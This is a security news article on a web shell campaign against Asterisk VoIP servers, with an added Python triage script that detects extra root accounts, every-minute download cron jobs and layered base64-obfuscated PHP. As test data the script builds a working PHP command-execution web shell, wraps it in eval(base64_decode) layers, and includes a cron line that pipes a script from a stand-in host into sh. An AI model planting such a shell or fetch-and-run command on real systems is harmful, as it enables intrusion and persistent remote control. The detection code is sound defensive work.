Servers running Digium's Asterisk VoIP software have been targeted with a web shell as part of an attack campaign designed to exfiltrate data by downloading and running additional payloads.
“The malware installs obfuscated multi-layered PHP backdoors on the web server’s file system, downloads new payloads to run, and schedules recurring tasks to re-infect the host system,” Palo Alto Networks Unit 42 said in a Friday report.
The unusual activity reportedly began in mid-December 2021 and targets Asterisk, a widely used software implementation of a private branch exchange (PBX) that runs on the open-source Elastix Unified Communications server.
Unit 42 said the intrusions share similarities with the INJ3CTOR3 campaign that Israeli cybersecurity firm Check Point disclosed in November 2020, hinting at the possibility that they could be a “resurgence” of previous attacks.
Coinciding with this sudden surge was the public disclosure in December 2021 of a now-patched remote code execution flaw in FreePBX, an open-source, web-based GUI used to control and manage Asterisk. Tracked as CVE-2021-45461, the flaw carries a CVSS severity score of 9.8 out of 10.
The attacks begin with the retrieval of an initial dropper shell script from a remote server, which installs the PHP web shell in several locations on the filesystem and creates two root-level user accounts to maintain remote access.
It also creates a scheduled task (a cron job) that runs every minute and fetches a fresh copy of the shell script from the attacker-controlled domain for execution, so the host is re-infected even if the web shell itself is removed.
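The three host-side artefacts described above (a multi-layered base64/eval PHP backdoor, extra UID-0 accounts, and an every-minute cron job that downloads and runs a remote script) can each be checked for with a few lines of code. The following is an added triage example written for this page; it is not Unit 42's code and contains none of the campaign's actual indicators. The /etc/passwd excerpt, crontab, account names, the `example.invalid` domain and the inner `system($_GET['cmd'])` shell are all constructed for illustration, and the obfuscated sample is built at import time by wrapping that inner shell in two `eval(base64_decode(...))` layers so the peeler has something real to unwrap.

```python
"""Host-side triage checks for the Asterisk/Elastix web shell campaign described above.

Added example, not Unit 42's code or the campaign's actual artefacts. All sample
data below is constructed for illustration; paths, user names and domains are
assumptions, not indicators of compromise from the report.
"""
import base64
import re

# --- constructed sample data ---------------------------------------------------

# Constructed /etc/passwd excerpt: 'root' is legitimate; the other two UID-0
# entries stand in for attacker-created root-equivalent accounts.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
asterisk:x:1001:1001::/var/lib/asterisk:/sbin/nologin
sysadm:x:0:0::/tmp:/bin/bash
backup:x:0:0::/:/bin/sh
"""

# Constructed crontab: one benign hourly job and one every-minute job that
# fetches and executes a remote shell script (the re-infection pattern).
SAMPLE_CRONTAB = """\
0 * * * * /usr/sbin/logrotate /etc/logrotate.conf
* * * * * curl -s http://example.invalid/a.sh | sh
"""

# Constructed minimal command-execution web shell used as the innermost layer.
INNER_SHELL = "<?php system($_GET['cmd']); ?>"


def wrap_in_base64_eval(php_src: str) -> str:
    """Wrap PHP source in one eval(base64_decode('...')) layer (builds the sample)."""
    encoded = base64.b64encode(php_src.encode()).decode()
    return f"<?php eval(base64_decode('{encoded}')); ?>"


# Two obfuscation layers around the inner shell, generated here so the encoded
# strings are genuine and the peeler can be exercised offline.
SAMPLE_WEBSHELL = wrap_in_base64_eval(wrap_in_base64_eval(INNER_SHELL))

# --- checks ----------------------------------------------------------------------

def extra_uid0_accounts(passwd_text: str) -> list[str]:
    """Return user names with UID 0 other than 'root' (any hit needs explaining)."""
    found = []
    for line in passwd_text.splitlines():
        fields = line.split(":")
        if len(fields) >= 3 and fields[2] == "0" and fields[0] != "root":
            found.append(fields[0])
    return found


DOWNLOADER = re.compile(r"\b(curl|wget)\b")


def every_minute_download_jobs(crontab_text: str) -> list[str]:
    """Return cron lines scheduled '* * * * *' whose command invokes curl or wget."""
    hits = []
    for line in crontab_text.splitlines():
        parts = line.split(None, 5)  # five schedule fields + the command
        if len(parts) == 6 and parts[:5] == ["*"] * 5 and DOWNLOADER.search(parts[5]):
            hits.append(line)
    return hits


B64_EVAL = re.compile(
    r"eval\s*\(\s*base64_decode\s*\(\s*['\"]([A-Za-z0-9+/=]+)['\"]\s*\)\s*\)"
)


def peel_base64_layers(php_src: str, max_layers: int = 10) -> tuple[int, str]:
    """Strip nested eval(base64_decode('...')) layers.

    Returns (layers_removed, innermost_source). max_layers bounds the loop so a
    self-referential or hostile sample cannot spin forever.
    """
    layers = 0
    current = php_src
    while layers < max_layers:
        m = B64_EVAL.search(current)
        if not m:
            break
        current = base64.b64decode(m.group(1)).decode("utf-8", errors="replace")
        layers += 1
    return layers, current


SHELL_PRIMITIVES = re.compile(r"\b(system|shell_exec|passthru|exec|popen|proc_open)\s*\(")


def looks_like_webshell(php_src: str) -> bool:
    """True if, after peeling obfuscation, the source calls a command-execution primitive."""
    _, inner = peel_base64_layers(php_src)
    return bool(SHELL_PRIMITIVES.search(inner))


if __name__ == "__main__":
    print("extra UID-0 accounts:", extra_uid0_accounts(SAMPLE_PASSWD))
    print("every-minute download jobs:", every_minute_download_jobs(SAMPLE_CRONTAB))
    layers, inner = peel_base64_layers(SAMPLE_WEBSHELL)
    print(f"obfuscation layers peeled: {layers}; innermost source: {inner}")
    print("looks like a web shell:", looks_like_webshell(SAMPLE_WEBSHELL))
```

On a real host the same functions would be fed the contents of /etc/passwd, the root and asterisk crontabs (including /etc/cron.d), and every .php file under the web root; the peeler only handles the plain `eval(base64_decode())` idiom, so a sample that also uses gzinflate or str_rot13 would need matching decode steps added to the loop.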
Besides taking measures to cover its tracks, the malware is also able to execute arbitrary commands, ultimately allowing the attackers to take control of the system, steal information, and maintain a backdoor into compromised hosts.
“The strategy of planting web shells in vulnerable servers is not a new tactic for malicious actors,” the researchers said, adding that it is a “common approach taken by malware authors to launch exploits or execute commands remotely.”